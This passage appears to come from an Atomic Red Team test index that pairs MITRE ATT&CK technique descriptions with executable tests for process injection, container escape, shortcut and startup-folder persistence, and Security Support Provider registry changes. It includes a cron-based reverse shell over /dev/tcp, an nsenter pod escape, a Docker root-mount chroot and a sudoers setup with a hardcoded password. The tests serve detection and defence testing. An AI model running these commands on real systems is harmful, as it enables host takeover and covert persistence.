Stop-Process -Name #{spawn_process_name} -ErrorAction SilentlyContinue
- name: Remote Process Injection with Go using CreateRemoteThread WinAPI
auto_generated_guid: 69534efc-d5f5-4550-89e6-12c6457b9edd
description: |
Leverages the Windows CreateRemoteThread function from Kernel32.dll to execute shellocde in a remote process.
This application leverages functions from the golang.org/x/sys/windows package, where feasible, like the windows.OpenProcess().
Steps taken with this technique
1. Get a handle to the target process
2. Allocate memory for the shellcode with VirtualAllocEx setting the page permissions to Read/Write
3. Use the WriteProcessMemory to copy the shellcode to the allocated memory space in the remote process
4. Change the memory page permissions to Execute/Read with VirtualProtectEx
5. Execute the entrypoint of the shellcode in the remote process with CreateRemoteThread
6. Close the handle to the remote process
- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createremotethread)
- References:
- https://www.ired.team/offensive-security/code-injection-process-injection/process-injection
supported_platforms:
- windows
input_arguments:
spawn_process_path:
description: Path of the binary to spawn
type: string
default: C:\Windows\System32\werfault.exe
spawn_process_name:
description: Name of the process spawned
type: string
default: werfault
executor:
name: powershell
elevation_required: false
command: |
$process = Start-Process #{spawn_process_path} -passthru
$PathToAtomicsFolder\T1055\bin\x64\CreateRemoteThread.exe -pid $process.Id -debug
cleanup_command: |
Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
Stop-Process -Name #{spawn_process_name} -ErrorAction SilentlyContinue
- name: Remote Process Injection with Go using CreateRemoteThread WinAPI (Natively)
auto_generated_guid: 2a4ab5c1-97ad-4d6d-b5d3-13f3a6c94e39
description: |
Leverages the Windows CreateRemoteThread function from Kernel32.dll to execute shellcode in a remote process.
This program loads the DLLs and gets a handle to the used procedures itself instead of using the windows package directly.
1. Get a handle to the target process
2. Allocate memory for the shellcode with VirtualAllocEx setting the page permissions to Read/Write
3. Use the WriteProcessMemory to copy the shellcode to the allocated memory space in the remote process
4. Change the memory page permissions to Execute/Read with VirtualProtectEx
5. Execute the entrypoint of the shellcode in the remote process with CreateRemoteThread
6. Close the handle to the remote process
- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createremotethreadnative)
supported_platforms:
- windows
input_arguments:
spawn_process_path:
description: Path of the binary to spawn
type: string
default: C:\Windows\System32\werfault.exe
spawn_process_name:
description: Name of the process spawned
type: string
default: werfault
executor:
name: powershell
elevation_required: false
command: |
$process = Start-Process #{spawn_process_path} -passthru
$PathToAtomicsFolder\T1055\bin\x64\CreateRemoteThreadNative.exe -pid $process.Id -debug
cleanup_command: |
Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
Stop-Process -Name #{spawn_process_name} -ErrorAction SilentlyContinue
- name: Process Injection with Go using CreateThread WinAPI
auto_generated_guid: 2871ed59-3837-4a52-9107-99500ebc87cb
description: |
This program executes shellcode in the current process using the following steps
1. Allocate memory for the shellcode with VirtualAlloc setting the page permissions to Read/Write
2. Use the RtlCopyMemory macro to copy the shellcode to the allocated memory space
3. Change the memory page permissions to Execute/Read with VirtualProtect
4. Call CreateThread on shellcode address
5. Call WaitForSingleObject so the program does not end before the shellcode is executed
This program leverages the functions from golang.org/x/sys/windows to call Windows procedures instead of manually loading them
- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createthread)
supported_platforms:
- windows
executor:
name: powershell
elevation_required: false
command: "$PathToAtomicsFolder\\T1055\\bin\\x64\\CreateThread.exe -debug\n"
cleanup_command: 'Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
'
- name: Process Injection with Go using CreateThread WinAPI (Natively)
auto_generated_guid: 2a3c7035-d14f-467a-af94-933e49fe6786
description: |
This program executes shellcode in the current process using the following steps
1. Allocate memory for the shellcode with VirtualAlloc setting the page permissions to Read/Write
2. Use the RtlCopyMemory macro to copy the shellcode to the allocated memory space
3. Change the memory page permissions to Execute/Read with VirtualProtect
4. Call CreateThread on shellcode address
5. Call WaitForSingleObject so the program does not end before the shellcode is executed
This program loads the DLLs and gets a handle to the used procedures itself instead of using the windows package directly.
- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createthreadnative)
supported_platforms:
- windows
executor:
name: powershell
elevation_required: false
command: "$PathToAtomicsFolder\\T1055\\bin\\x64\\CreateThreadNative.exe -debug\n"
cleanup_command: 'Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
'
- name: UUID custom process Injection
auto_generated_guid: '0128e48e-8c1a-433a-a11a-a5304734f1e1'
description: |
The UUIDs Process Injection code was first introduced by the NCC Group. The code can be stored in UUID forms on the heap and converted back to binary via UuidFromStringA at runtime. In this new custom version of UUID injection, EnumSystemLocalesA is the only API called to execute the code. We used custom UuidToString and UuidFromString implementations to avoid using UuidFromStringA and RPCRT4.dll, thereby eliminating the static signatures. This technique also avoided the use of VirtualAlloc, WriteProcessMemory and CreateThread
The injected shellcode will open a message box and a notepad.
Reference to NCC Group: https://research.nccgroup.com/2021/01/23/rift-analysing-a-lazarus-shellcode-execution-method/
Concept from: http://ropgadget.com/posts/abusing_win_functions.html
supported_platforms:
- windows
input_arguments:
exe_binary:
description: PE binary
type: path
default: PathToAtomicsFolder\T1055\bin\x64\uuid_injection.exe
dependency_executor_name: powershell
dependencies:
- description: 'Portable Executable to inject must exist at specified location
(#{exe_binary})
'
prereq_command: 'if (Test-Path "#{exe_binary}") {exit 0} else {exit 1}
'
get_prereq_command: |
New-Item -Type Directory (split-path "#{exe_binary}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055/bin/x64/uuid_injection.exe" -OutFile "#{exe_binary}"
executor:
command: |-
Start-Process "#{exe_binary}"
Start-Sleep -Seconds 7
Get-Process -Name Notepad -ErrorAction SilentlyContinue | Stop-Process -Force
cleanup_command: Get-Process -Name Notepad -ErrorAction SilentlyContinue |
Stop-Process -Force
name: powershell
elevation_required: true
T1611:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--4a5b7ade-8bb5-4853-84ed-23f262002665
created: '2021-03-30T17:38:34.277Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1611
external_id: T1611
- source_name: Container Escape
description: 0xn3va. (n.d.). Escaping. Retrieved May 27, 2022.
url: https://0xn3va.gitbook.io/cheat-sheets/container/escaping
- source_name: Broadcom VMSA-2025-004
description: 'Broadcom. (2025, March 6). VMSA-2025-0004: Questions & Answers.
Retrieved March 26, 2025.'
url: https://github.com/vmware/vcf-security-and-compliance-guidelines/tree/main/security-advisories/vmsa-2025-0004
- source_name: Windows Server Containers Are Open
description: Daniel Prizmant. (2020, July 15). Windows Server Containers Are
Open, and Here's How You Can Break Out. Retrieved October 1, 2021.
url: https://unit42.paloaltonetworks.com/windows-server-containers-vulnerabilities/
- source_name: Docker Overview
description: Docker. (n.d.). Docker Overview. Retrieved March 30, 2021.
url: https://docs.docker.com/get-started/overview/
- source_name: Docker Bind Mounts
description: Docker. (n.d.). Use Bind Mounts. Retrieved March 30, 2021.
url: https://docs.docker.com/storage/bind-mounts/
- source_name: Trend Micro Privileged Container
description: Fiser, D., Oliveira, A.. (2019, December 20). Why a Privileged
Container in Docker is a Bad Idea. Retrieved March 30, 2021.
url: https://www.trendmicro.com/en_us/research/19/l/why-running-a-privileged-container-in-docker-is-a-bad-idea.html
- source_name: Intezer Doki July 20
description: 'Fishbein, N., Kajiloti, M.. (2020, July 28). Watch Your Containers:
Doki Infecting Docker Servers in the Cloud. Retrieved March 30, 2021.'
url: https://www.intezer.com/blog/cloud-security/watch-your-containers-doki-infecting-docker-servers-in-the-cloud/
- source_name: Crowdstrike Kubernetes Container Escape
description: 'Manoj Ahuje. (2022, January 31). CVE-2022-0185: Kubernetes Container
Escape Using Linux Kernel Exploit. Retrieved July 6, 2022.'
url: https://www.crowdstrike.com/blog/cve-2022-0185-kubernetes-container-escape-using-linux-kernel-exploit/
- source_name: Keyctl-unmask
description: 'Mark Manning. (2020, July 23). Keyctl-unmask: "Going Florida"
on The State Of Containerizing Linux Keyrings. Retrieved July 6, 2022.'
url: https://www.antitree.com/2020/07/keyctl-unmask-going-florida-on-the-state-of-containerizing-linux-keyrings/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:44.317Z'
name: Escape to Host
description: |-
Adversaries may break out of a container or virtualized environment to gain access to the underlying host. This can allow an adversary access to other containerized or virtualized resources from the host level or to the host itself. In principle, containerized / virtualized resources should provide a clear separation of application functionality and be isolated from the host environment.(Citation: Docker Overview)
There are multiple ways an adversary may escape from a container to a host environment. Examples include creating a container configured to mount the host’s filesystem using the bind parameter, which allows the adversary to drop payloads and execute control utilities such as cron on the host; utilizing a privileged container to run commands or load a malicious kernel module on the underlying host; or abusing system calls such as `unshare` and `keyctl` to escalate privileges and steal secrets.(Citation: Docker Bind Mounts)(Citation: Trend Micro Privileged Container)(Citation: Intezer Doki July 20)(Citation: Container Escape)(Citation: Crowdstrike Kubernetes Container Escape)(Citation: Keyctl-unmask)
Additionally, an adversary may be able to exploit a compromised container with a mounted container management socket, such as `docker.sock`, to break out of the container via a [Container Administration Command](https://attack.mitre.org/techniques/T1609).(Citation: Container Escape) Adversaries may also escape via [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), such as exploiting vulnerabilities in global symbolic links in order to access the root directory of a host machine.(Citation: Windows Server Containers Are Open)
In ESXi environments, an adversary may exploit a vulnerability in order to escape from a virtual machine into the hypervisor.(Citation: Broadcom VMSA-2025-004)
Gaining access to the host may provide the adversary with the opportunity to achieve follow-on objectives, such as establishing persistence, moving laterally within the environment, accessing other containers or virtual machines running on the host, or setting up a command and control channel on the host.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Yuval Avrahami, Palo Alto Networks
- Daniel Prizmant, Palo Alto Networks
- Alfredo Oliveira, Trend Micro
- David Fiser, @anu4is, Trend Micro
- Idan Frimark, Cisco
- Magno Logan, @magnologan, Trend Micro
- Ariel Shuper, Cisco
- Yossi Weizman, Azure Defender Research Team
- Vishwas Manral, McAfee
- CrowdStrike
- Eran Ayalon, Cybereason
- Oren Ofer, Cybereason
- Ilan Sokol, Cybereason
- Joas Antonio dos Santos, @C0d3Cr4zy
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- Linux
- Containers
- ESXi
x_mitre_version: '1.6'
identifier: T1611
atomic_tests:
- name: Deploy container using nsenter container escape
auto_generated_guid: 0b2f9520-a17a-4671-9dba-3bd034099fff
description: |
In this escape `kubectl` is used to launch a new pod, with a container that has the host pids mapped into the container (`hostPID:true`). It uses the alpine linux container image. It runs with privilege on the host (`privileged:true`). When the container is launched the command `nsenter --mount=/proc/1/ns/mnt -- /bin/bash` is ran. Since the host processes have been mapped into the container, the container enters the host namespace, escaping the container.
Additional Details:
- https://twitter.com/mauilion/status/1129468485480751104
- https://securekubernetes.com/scenario_2_attack/
supported_platforms:
- containers
dependency_executor_name: sh
dependencies:
- description: Verify docker is installed.
prereq_command: 'which docker
'
get_prereq_command: 'if [ "" == "`which docker`" ]; then echo "Docker Not
Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker
; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else
echo "Docker installed"; fi
'
- description: Verify docker service is running.
prereq_command: 'sudo systemctl status docker
'
get_prereq_command: 'sudo systemctl start docker
'
- description: Verify kind is in the path.
prereq_command: 'which kind
'
get_prereq_command: |
curl -Lo ./kind https://kind.sigs.k8s.io/dl/v0.10.0/kind-linux-amd64
chmod +x ./kind
mv kind /usr/bin/kind
- description: Verify kind-atomic-cluster is created
prereq_command: 'sudo kind get clusters
'
get_prereq_command: 'sudo kind create cluster --name atomic-cluster
'
- description: Verify kubectl is in path
prereq_command: 'which kubectl
'
get_prereq_command: |
curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl"
chmod +x ./kubectl
mv kubectl /usr/bin/kubectl
executor:
command: 'kubectl --context kind-atomic-cluster run atomic-nsenter-escape-pod
--restart=Never -ti --rm --image alpine --overrides ''{"spec":{"hostPID":
true, "containers":[{"name":"1","image":"alpine","command":["nsenter","--mount=/proc/1/ns/mnt","--","/bin/bash"],"stdin":
true,"tty":true,"securityContext":{"privileged":true}}]}}''
'
name: sh
cleanup_command: 'kubectl --context kind-atomic-cluster delete pod atomic-escape-pod
'
- name: Mount host filesystem to escape privileged Docker container
auto_generated_guid: 6c499943-b098-4bc6-8d38-0956fc182984
description: "This technique abuses privileged Docker containers to mount the
host's filesystem and then create a cron job to launch a reverse shell as
the host's superuser.\nThe container running the test needs be privileged.
\ It may take up to a minute for this to run due to how often crond triggers
a job.\nDev note: the echo to create cron_filename is broken up to prevent
localized execution of hostname and id by Powershell. \n"
supported_platforms:
- containers
input_arguments:
mount_device:
description: Path to the device of the host's disk to mount
type: path
default: "/dev/dm-0"
mount_point:
description: Path where the host filesystem will be mounted
type: path
default: "/mnt/T1611.002"
cron_path:
description: Path on the host filesystem where cron jobs are stored
type: path
default: "/etc/cron.d"
cron_filename:
description: Filename of the cron job in cron_path
type: string
default: T1611_002
listen_address:
description: IP address to listen for callback from the host system.
type: string
default: "`ifconfig eth0 | grep inet | awk '{print $2}'`"
listen_port:
description: TCP Port to listen on for callback from the host system.
type: integer
default: 4444
dependency_executor_name: sh
dependencies:
- description: Verify mount is installed.
prereq_command: 'which mount
'
get_prereq_command: 'if [ "" == "`which mount`" ]; then echo "mount Not Found";
if [ -n "`which apt-get`" ]; then sudo apt-get -y install mount ; elif [
-n "`which yum`" ]; then sudo yum -y install mount ; fi ; else echo "mount
installed"; fi
'
- description: Verify container is privileged.
prereq_command: 'capsh --print | grep cap_sys_admin
'
get_prereq_command: 'if [ "`capsh --print | grep cap_sys_admin`" == "" ];
then echo "Container not privileged. Re-start container in insecure state. Docker:
run with --privileged flag. Kubectl, add securityContext: privileged: true";
fi
'
- description: Verify mount device (/dev/dm-0) exists.
prereq_command: 'ls #{mount_device}
'
get_prereq_command: 'if [ ! -f #{mount_device} ]; then echo "Container not
privileged or wrong device path. Re-start container in insecure state. Docker:
run with --privileged flag. Kubectl, add securityContext: privileged: true";
fi
'
- description: Netcat is installed.
prereq_command: 'which netcat
'
get_prereq_command: 'if [ "" == "`which netcat`" ]; then echo "netcat Not
Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install netcat
; elif [ -n "`which yum`" ]; then sudo yum -y install netcat ; fi
'
- description: IP Address is known.
prereq_command: 'if [ "#{listen_address}" != "" ]; then echo "Listen address
set as #{listen_address}" ; fi
'
get_prereq_command: 'if [ "" == "`which ifconfig`" ]; then echo "ifconfig
Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install net=tools
; elif [ -n "`which yum`" ]; then sudo yum -y install net-tools ; fi
'
executor:
name: sh
elevation_required: true
command: |
if [ ! -d #{mount_point} ]; then mkdir #{mount_point} ; mount #{mount_device} #{mount_point}; fi
echo -n "* * * * * root /bin/bash -c '/bin/bash -c echo \"\"; echo \"hello from host! " > #{mount_point}#{cron_path}/#{cron_filename}
echo -n "$" >> #{mount_point}#{cron_path}/#{cron_filename}
echo -n "(hostname) " >> #{mount_point}#{cron_path}/#{cron_filename}
echo -n "$" >> #{mount_point}#{cron_path}/#{cron_filename}
echo "(id)\" >& /dev/tcp/#{listen_address}/#{listen_port} 0>&1'" >> #{mount_point}#{cron_path}/#{cron_filename}
netcat -l -p #{listen_port} 2>&1
cleanup_command: |
rm #{mount_point}#{cron_path}/#{cron_filename}
umount #{mount_point}
rmdir #{mount_point}
- name: Privilege Escalation via Docker Volume Mapping
auto_generated_guid: 39fab1bc-fcb9-406f-bc2e-fe03e42ff0e4
description: |
This test demonstrates privilege escalation by abusing Docker's volume mapping
feature to gain access to the host file system. By mounting the root directory
of the host into a Docker container, the attacker can use chroot to operate as
root on the host system.
supported_platforms:
- containers
input_arguments:
username:
default: docker_user
description: Username that run attack command
type: string
dependencies:
- description: Docker
prereq_command: 'command -v docker &> /dev/null && echo "Docker is installed"
|| { echo "Docker is not installed."; exit 1; }
'
get_prereq_command: 'echo "You should install docker manually."
'
- description: Docker Privileged User
prereq_command: 'sudo -l -U #{username} | grep "(ALL) NOPASSWD: /usr/bin/docker"
'
get_prereq_command: |
USERNAME="#{username}"
PASSWORD="password123"
SUDO_COMMAND="/usr/bin/docker"
SUDOERS_FILE="/etc/sudoers.d/$USERNAME"
[[ $EUID -ne 0 ]] && echo "Run as root." && exit 1; id "$USERNAME" &>/dev/null || { useradd -m -s /bin/bash "$USERNAME" && echo "$USERNAME:$PASSWORD" | chpasswd; }; [[ -f "$SUDOERS_FILE" ]] || { echo "$USERNAME ALL=(ALL) NOPASSWD: $SUDO_COMMAND" > "$SUDOERS_FILE" && chmod 440 "$SUDOERS_FILE"; }; echo "Setup complete. User: $USERNAME, Password: $PASSWORD"
executor:
name: sh
elevation_required: true
command: |
echo "Current user: #{username}"
sudo -u docker_user sh -c "sudo docker run -v /:/mnt --rm --name t1611_privesc -it alpine chroot /mnt id"
cleanup_command: 'USERNAME="#{username}"; SUDOERS_FILE="/etc/sudoers.d/$USERNAME";
id "$USERNAME" &>/dev/null && userdel -r "$USERNAME" && echo -e "$USERNAME
is deleted."; [[ -f "$SUDOERS_FILE" ]] && rm -f "$SUDOERS_FILE"; echo "Cleanup
complete."
'
T1547.009:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--4ab929c6-ee2d-4fb5-aab4-b14be2ed7179
created: '2020-01-24T19:00:32.917Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1547/009
external_id: T1547.009
- source_name: 'Shortcut for Persistence '
description: Elastic. (n.d.). Shortcut File Written or Modified for Persistence.
Retrieved June 1, 2022.
url: https://www.elastic.co/guide/en/security/7.17/shortcut-file-written-or-modified-for-persistence.html#shortcut-file-written-or-modified-for-persistence
- source_name: BSidesSLC 2020 - LNK Elastic
description: French, D., Filar, B.. (2020, March 21). A Chain Is No Stronger
Than Its Weakest LNK. Retrieved November 30, 2020.
url: https://www.youtube.com/watch?v=nJ0UsyiUEqQ
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:44.403Z'
name: 'Boot or Logon Autostart Execution: Shortcut Modification'
description: |-
Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.
Adversaries may abuse shortcuts in the startup folder to execute their tools and achieve persistence.(Citation: Shortcut for Persistence ) Although often used as payloads in an infection chain (e.g. [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)), adversaries may also create a new shortcut as a means of indirection, while also abusing [Masquerading](https://attack.mitre.org/techniques/T1036) to make the malicious shortcut appear as a legitimate program. Adversaries can also edit the target path or entirely replace an existing shortcut so their malware will be executed instead of the intended legitimate program.
Shortcuts can also be abused to establish persistence by implementing other methods. For example, LNK browser extensions may be modified (e.g. [Browser Extensions](https://attack.mitre.org/techniques/T1176/001)) to persistently launch malware.
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- David French, Elastic
- Bobby, Filar, Elastic
- Travis Smith, Tripwire
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.3'
identifier: T1547.009
atomic_tests:
- name: Shortcut Modification
auto_generated_guid: ce4fc678-364f-4282-af16-2fb4c78005ce
description: |
This test to simulate shortcut modification and then execute. example shortcut (*.lnk , .url) strings check with powershell;
gci -path "C:\Users" -recurse -include *.url -ea SilentlyContinue | Select-String -Pattern "exe" | FL.
Upon execution, calc.exe will be launched.
supported_platforms:
- windows
input_arguments:
shortcut_file_path:
description: shortcut modified and execute
type: path
default: "%temp%\\T1547.009_modified_shortcut.url"
executor:
command: |
echo [InternetShortcut] > #{shortcut_file_path}
echo URL=C:\windows\system32\calc.exe >> #{shortcut_file_path}
#{shortcut_file_path}
cleanup_command: 'del -f #{shortcut_file_path} >nul 2>&1
'
name: command_prompt
- name: Create shortcut to cmd in startup folders
auto_generated_guid: cfdc954d-4bb0-4027-875b-a1893ce406f2
description: |
LNK file to launch CMD placed in startup folder. Upon execution, open File Explorer and browse to "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\"
to view the new shortcut.
supported_platforms:
- windows
executor:
command: |
$Shell = New-Object -ComObject ("WScript.Shell")
$ShortCut = $Shell.CreateShortcut("$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\T1547.009.lnk")
$ShortCut.TargetPath="cmd.exe"
$ShortCut.WorkingDirectory = "C:\Windows\System32";
$ShortCut.WindowStyle = 1;
$ShortCut.Description = "T1547.009.";
$ShortCut.Save()
$Shell = New-Object -ComObject ("WScript.Shell")
$ShortCut = $Shell.CreateShortcut("$env:ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\T1547.009.lnk")
$ShortCut.TargetPath="cmd.exe"
$ShortCut.WorkingDirectory = "C:\Windows\System32";
$ShortCut.WindowStyle = 1;
$ShortCut.Description = "T1547.009.";
$ShortCut.Save()
cleanup_command: |
Remove-Item "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\T1547.009.lnk" -ErrorAction Ignore
Remove-Item "$env:ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\T1547.009.lnk" -ErrorAction Ignore
name: powershell
elevation_required: true
T1547.005:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--5095a853-299c-4876-abd7-ac0050fb5462
created: '2020-01-24T17:16:11.806Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1547/005
external_id: T1547.005
- source_name: Graeber 2014
description: Graeber, M. (2014, October). Analysis of Malicious Security Support
Provider DLLs. Retrieved March 1, 2017.
url: http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html
- source_name: Microsoft Configure LSA
description: Microsoft. (2013, July 31). Configuring Additional LSA Protection.
Retrieved June 24, 2015.
url: https://technet.microsoft.com/en-us/library/dn408187.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:46.245Z'
name: 'Boot or Logon Autostart Execution: Security Support Provider'
description: |-
Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.
The SSP configuration is stored in two Registry keys: HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages and HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
identifier: T1547.005
atomic_tests:
- name: Modify HKLM:\System\CurrentControlSet\Control\Lsa Security Support Provider
configuration in registry
auto_generated_guid: afdfd7e3-8a0b-409f-85f7-886fdf249c9e
description: |
Add a value to a Windows registry Security Support Provider pointing to a payload .dll which will normally need to be copied in the system32 folder.
A common DLL used with this techquite is the minilib.dll from mimikatz, see https://pentestlab.blog/2019/10/21/persistence-security-support-provider/
supported_platforms:
- windows
executor:
command: |
$oldvalue = $(Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages');
Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name 'Security Packages old' -Value "$oldvalue";
$newvalue = "AtomicTest.dll";
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $newvalue
cleanup_command: |-
$oldvalue = $(Get-ItemPropertyValue -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name 'Security Packages old' | Select-Object -ExpandProperty 'Security Packages old');
Set-ItemProperty -Path HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value "$oldvalue";
Remove-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name 'Security Packages old';
name: powershell
elevation_required: true
- name: Modify HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig Security Support
Provider configuration in registry
auto_generated_guid: de3f8e74-3351-4fdb-a442-265dbf231738
description: Add a value to a Windows registry SSP key, simulating an adversarial
modification of those keys.
supported_platforms:
- windows
executor:
command: |
$oldvalue = $(Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages');
Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig" -Name 'Security Packages old' -Value "$oldvalue";
$newvalue = "AtomicTest.dll";
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig -Name 'Security Packages' -Value $newvalue
cleanup_command: |-
$oldvalue = $(Get-ItemPropertyValue -Path "HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig" -Name 'Security Packages old' | Select-Object -ExpandProperty 'Security Packages old');
Set-ItemProperty -Path HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig -Name 'Security Packages' -Value "$oldvalue";
Remove-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa\OSConfig" -Name 'Security Packages old';
name: powershell
elevation_required: true
T1543.004:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--573ad264-1371-4ae0-8482-d2673b719dba
created: '2020-01-17T19:23:15.227Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1543/004
external_id: T1543.004
- source_name: AppleDocs Launch Agent Daemons
description: Apple. (n.d.). Creating Launch Daemons and Agents. Retrieved
July 10, 2017.
url: https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html
- source_name: LaunchDaemon Hijacking
description: 'Bradley Kemp. (2021, May 10). LaunchDaemon Hijacking: privilege
escalation and persistence via insecure folder permissions. Retrieved July
26, 2021.'
url: https://bradleyjkemp.dev/post/launchdaemon-hijacking/
- source_name: WireLurker
description: 'Claud Xiao. (n.d.). WireLurker: A New Era in iOS and OS X Malware.
Retrieved July 10, 2017.'
url: https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf
- source_name: launchd Keywords for plists
description: Dennis German. (2020, November 20). launchd Keywords for plists.
Retrieved October 7, 2021.
url: https://www.real-world-systems.com/docs/launchdPlist.1.html
- source_name: Methods of Mac Malware Persistence
description: Patrick Wardle. (2014, September). Methods of Malware Persistence
on Mac OS X. Retrieved July 5, 2017.
url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf
- source_name: OSX Malware Detection
description: 'Patrick Wardle. (2016, February 29). Let''s Play Doctor: Practical
OS X Malware Detection & Analysis. Retrieved November 17, 2024.'
url: https://papers.put.as/papers/macosx/2016/RSA_OSX_Malware.pdf
- source_name: sentinelone macos persist Jun 2019
description: Stokes, Phil. (2019, June 17). HOW MALWARE PERSISTS ON MACOS.
Retrieved September 10, 2019.
url: https://www.sentinelone.com/blog/how-malware-persists-on-macos/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:49.387Z'
name: 'Create or Modify System Process: Launch Daemon'
description: |-
Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in /System/Library/LaunchDaemons/ and /Library/LaunchDaemons/. Required Launch Daemons parameters include a Label to identify the task, Program to provide a path to the executable, and RunAtLoad to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.(Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists)
Adversaries may install a Launch Daemon configured to execute at startup by using the RunAtLoad parameter set to true and the Program parameter set to the malicious executable path. The daemon name may be disguised by using a name from a related operating system or benign software (i.e. [Masquerading](https://attack.mitre.org/techniques/T1036)). When the Launch Daemon is executed, the program inherits administrative permissions.(Citation: WireLurker)(Citation: OSX Malware Detection)
